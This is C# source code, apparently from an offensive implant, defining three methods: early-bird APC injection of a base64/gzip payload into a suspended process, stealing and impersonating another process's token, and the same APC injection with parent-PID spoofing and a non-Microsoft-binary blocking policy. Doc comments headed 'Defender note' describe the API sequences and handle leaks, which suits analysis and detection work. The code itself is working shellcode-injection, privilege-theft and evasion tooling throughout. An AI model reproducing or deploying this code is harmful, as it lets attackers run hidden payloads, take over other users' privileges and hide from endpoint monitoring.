/// <summary>
/// Launches <c>arguments[2]</c> as a suspended process, copies the decoded payload from
/// <c>arguments[1]</c> into that process, queues a user-mode APC whose routine address is the
/// copied buffer, and then resumes the child's initial thread. No Win32 return value is
/// checked: <c>success</c>, <c>resultBool</c> and <c>ptr</c> are assigned and ignored, so a
/// failing step is only surfaced if the interop layer throws. Always returns <c>null</c>.
/// </summary>
/// <param name="arguments">
/// <c>[1]</c>: base64 text of a gzip-compressed payload; <c>[2]</c>: command line of the process
/// to create, with '+' standing in for spaces. <c>[0]</c> is not read by this method.
/// </param>
/// <returns>Always <c>null</c>.</returns>
/// <remarks>
/// Defender note: the observable sequence is CreateProcess(CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT),
/// then cross-process VirtualAllocEx(PAGE_READWRITE), WriteProcessMemory, VirtualProtectEx to
/// PAGE_EXECUTE_READ, QueueUserAPC and finally ResumeThread — i.e. a RW→RX transition on a freshly
/// allocated region followed by an APC into it, all before the child has executed any code.
/// The process/thread handles returned in <c>pi</c> and the handle from OpenThread are not closed
/// in this block. Exceptions are reported via <c>Console.WriteLine</c> only.
/// </remarks>
public static string InjectAPC(string[] arguments)
{
    // '+' is the transport encoding for spaces in the command line argument.
    string targetProcess = arguments[2].Replace('+', ' ');
    // Payload arrives base64-encoded and gzip-compressed.
    byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
    // Declared but never used in this method.
    IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
    IntPtr lpThreadId = IntPtr.Zero;
    uint oldProtect = 0;
    STARTUPINFOEX si = new STARTUPINFOEX();
    flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
    var processSecurity = new flags.SECURITY_ATTRIBUTES();
    var threadSecurity = new flags.SECURITY_ATTRIBUTES();
    processSecurity.nLength = Marshal.SizeOf(processSecurity);
    threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
    // Pin the managed buffer so its address stays valid while WriteProcessMemory reads from it.
    GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
    IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
    try
    {
        // Child starts suspended; its primary thread has not run yet when the APC is queued.
        bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
        // Region is committed writable first and flipped to executable below (no RWX allocation).
        IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
        IntPtr bytesWritten = IntPtr.Zero;
        bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
        // Separate thread handle opened with SET_CONTEXT for QueueUserAPC; pi.hThread is used for ResumeThread.
        IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
        resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
        // APC routine address is the remote buffer itself; no parameter is passed.
        IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
        IntPtr ThreadHandle = pi.hThread;
        Interop.ResumeThread(ThreadHandle);
        handle.Free();
    }
    catch (Exception ex)
    {
        // Release the pin on the error path too; the child process (if created) is left as-is.
        handle.Free();
        Console.WriteLine(ex.Message);
    }
    return(null);
}
/// <summary>
/// Opens the process whose id is <c>arguments[1]</c>, obtains its primary token, duplicates it
/// as an impersonation token, and makes the calling thread impersonate it via
/// ImpersonateLoggedOnUser. On success the impersonation stays in effect for the calling thread
/// after this method returns, and the duplicated token handle is not closed.
/// </summary>
/// <param name="arguments"><c>[1]</c>: decimal process id to take the token from. <c>[0]</c> is not read.</param>
/// <returns>
/// A human-readable status string: the success message, one of the two failure messages, or the
/// message of any exception thrown (e.g. from <c>Int32.Parse</c> on a non-numeric argument).
/// </returns>
/// <remarks>
/// Defender note: the sequence is OpenProcess(All) → OpenProcessToken(TOKEN_ALL_ACCESS) →
/// DuplicateTokenEx(MAXIMUM_ALLOWED, SecurityImpersonation, TokenImpersonation) →
/// ImpersonateLoggedOnUser, i.e. a token-handle acquisition from another process followed by
/// thread-level impersonation. Handle hygiene is inconsistent: <c>procHandle</c> is only closed
/// when OpenProcessToken succeeds, and <c>TokenHandle</c> is passed to CloseHandle more than once.
/// </remarks>
public static string ProcImpersonation(string[] arguments)
{
    try
    {
        int targetId = Int32.Parse(arguments[1]);
        IntPtr TokenHandle = IntPtr.Zero;
        IntPtr hDuplicateToken = IntPtr.Zero;
        var securityAttr = new flags.SECURITY_ATTRIBUTES();
        securityAttr.nLength = Marshal.SizeOf(securityAttr);
        IntPtr procHandle = Interop.OpenProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId);
        if (Interop.OpenProcessToken(procHandle, TOKEN_ALL_ACCESS, out TokenHandle))
        {
            // Process handle is no longer needed once the token handle has been obtained.
            Interop.CloseHandle(procHandle);
        }
        else
        {
            // Failure is only printed; execution continues with TokenHandle still IntPtr.Zero,
            // so the DuplicateTokenEx call below is what ultimately reports the problem.
            Console.WriteLine("Failed to pass process handle");
        }
        if (!Interop.DuplicateTokenEx(TokenHandle, (UInt32)flags.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttr, flags.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, flags.TOKEN_TYPE.TokenImpersonation, out hDuplicateToken))
        {
            return("Failed to Duplicate Token - Make sure you have administrator privileges");
        }
        // First close of the original token handle; the duplicate is what gets impersonated.
        Interop.CloseHandle(TokenHandle);
        if (!Interop.ImpersonateLoggedOnUser(hDuplicateToken))
        {
            // TokenHandle was already closed above; this CloseHandle is on a stale handle value.
            Interop.CloseHandle(TokenHandle);
            Interop.CloseHandle(hDuplicateToken);
            return("Failed to Impersonate Token");
        }
        // Second close of an already-closed handle value; hDuplicateToken is intentionally left open
        // here since the calling thread is now impersonating it.
        Interop.CloseHandle(TokenHandle);
    }
    catch (Exception ex)
    {
        return(ex.Message);
    }
    return("You have successfully steal token from process");
}
/// <summary>
/// Same payload delivery as <c>InjectAPC</c> (suspended child, VirtualAllocEx / WriteProcessMemory /
/// VirtualProtectEx / QueueUserAPC / ResumeThread), but the child is created through an extended
/// startup-info attribute list that (a) sets a binary-signature mitigation policy on the child and
/// (b) designates the process returned by <c>SearchPID.SearchForPPID()</c> as the child's parent.
/// No Win32 return value is checked. Always returns <c>null</c>.
/// </summary>
/// <param name="arguments">
/// <c>[1]</c>: base64 text of a gzip-compressed payload; <c>[2]</c>: command line of the process
/// to create, with '+' standing in for spaces. <c>[0]</c> is not read by this method.
/// </param>
/// <returns>Always <c>null</c>.</returns>
/// <remarks>
/// Defender note: because PROC_THREAD_ATTRIBUTE_PARENT_PROCESS is supplied, the child's recorded
/// parent is <c>parentId</c> rather than the process running this code, so process-tree
/// reconstruction based on the parent pid alone will not show the true creator. The mitigation
/// attribute is only populated on 64-bit (the 32-bit branch writes zero). Nothing allocated here
/// is released: the two AllocHGlobal buffers, the attribute list, <c>parentHandle</c>, the handles
/// in <c>pi</c> and the OpenThread handle all remain open when the method returns.
/// </remarks>
public static string InjectAPCPPID(string[] arguments)
{
    // '+' is the transport encoding for spaces in the command line argument.
    string targetProcess = arguments[2].Replace('+', ' ');
    // Payload arrives base64-encoded and gzip-compressed.
    byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
    // Pointer-sized unmanaged slot holding the mitigation policy value for UpdateProcThreadAttribute.
    var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
    // Chosen by a helper outside this block; presumably a pid to present as the parent — confirm in SearchPID.
    int parentId = SearchPID.SearchForPPID();
    // Declared but never used in this method.
    IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
    IntPtr lpThreadId = IntPtr.Zero;
    uint oldProtect = 0;
    var lpValueProc = IntPtr.Zero;
    STARTUPINFOEX siEx = new STARTUPINFOEX();
    flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
    var processSecurity = new flags.SECURITY_ATTRIBUTES();
    var threadSecurity = new flags.SECURITY_ATTRIBUTES();
    processSecurity.nLength = Marshal.SizeOf(processSecurity);
    threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
    // Pin the managed buffer so its address stays valid while WriteProcessMemory reads from it.
    GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
    IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
    try
    {
        // Two-call pattern: first call with a null list queries the required size into lpSize,
        // second call initializes a list sized for two attributes.
        var lpSize = IntPtr.Zero;
        Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
        siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
        Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
        if (IntPtr.Size == 4)
        {
            // 32-bit: policy value is zero, so the attribute is added but carries no mitigation.
            Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
        }
        else
        {
            Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
        }
        Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
        // Handle to the designated parent; CreateProcess | DuplicateHandle are the rights requested.
        var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
        lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
        Marshal.WriteIntPtr(lpValueProc, parentHandle);
        Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
        // Child starts suspended with the extended startup info carrying both attributes.
        bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
        // Region is committed writable first and flipped to executable below (no RWX allocation).
        IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
        IntPtr bytesWritten = IntPtr.Zero;
        bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
        // Separate thread handle opened with SET_CONTEXT for QueueUserAPC; pi.hThread is used for ResumeThread.
        IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
        resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
        // APC routine address is the remote buffer itself; no parameter is passed.
        IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
        IntPtr ThreadHandle = pi.hThread;
        Interop.ResumeThread(ThreadHandle);
        handle.Free();
    }
    catch (Exception ex)
    {
        // Release the pin on the error path too; unmanaged allocations and handles are not released.
        handle.Free();
        Console.WriteLine(ex.Message);
    }
    return(null);
}